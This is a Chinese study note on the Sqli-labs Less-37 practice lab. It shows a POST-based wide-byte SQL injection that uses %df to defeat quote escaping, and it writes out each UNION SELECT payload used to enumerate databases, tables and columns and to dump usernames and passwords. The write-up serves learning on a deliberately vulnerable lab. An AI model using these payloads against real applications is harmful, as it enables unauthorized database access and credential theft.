Sqli-labs-Less-32 (笔记)

Sqli-labs-Less-37 (笔记)
通过界面显示可知需要使用post进行注入,使用burp进行抓包

查找注入点
uname=a’ or 1=1&passwd=admin&submit=Submit
查看提醒被转义
Sqli-labs-Less-37 (笔记)
加上%df,报错
Sqli-labs-Less-37 (笔记)
进行注释,成功,说明存在注入
uname=a%df’ or 1=1#&passwd=admin&submit=Submit
Sqli-labs-Less-37 (笔记)
查看列数
uname=a%df’ order by 2#&passwd=admin&submit=Submit
Sqli-labs-Less-37 (笔记)
为3时报错,说明存在2列

查看当前库
uname=a%df’ union select 1,database()#&passwd=admin&submit=Submit
Sqli-labs-Less-37 (笔记)
查看所有库
uname=a%df’ union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=admin&submit=Submit
Sqli-labs-Less-37 (笔记)
查看所有表
uname=a%df’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479#&passwd=admin&submit=Submit
Sqli-labs-Less-37 (笔记)

查看所有字段
uname=a%df’ union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=admin&submit=Submit
Sqli-labs-Less-37 (笔记)
查看所有账户和密码
uname=a%df’ union select 1,group_concat(concat_ws(0x7e,username,password)) from security.users#&passwd=admin&submit=Submit
Sqli-labs-Less-37 (笔记)
以此类推爆出所有数据。

相关文章:

  • 2021-09-24
  • 2021-11-07
  • 2021-09-17
  • 2021-12-03
  • 2021-06-15
  • 2021-07-08
  • 2022-01-16
  • 2021-05-12
猜你喜欢
  • 2021-08-22
  • 2021-04-12
  • 2021-06-07
  • 2021-11-13
  • 2021-07-14
  • 2022-01-09
  • 2022-01-06
相关资源
相似解决方案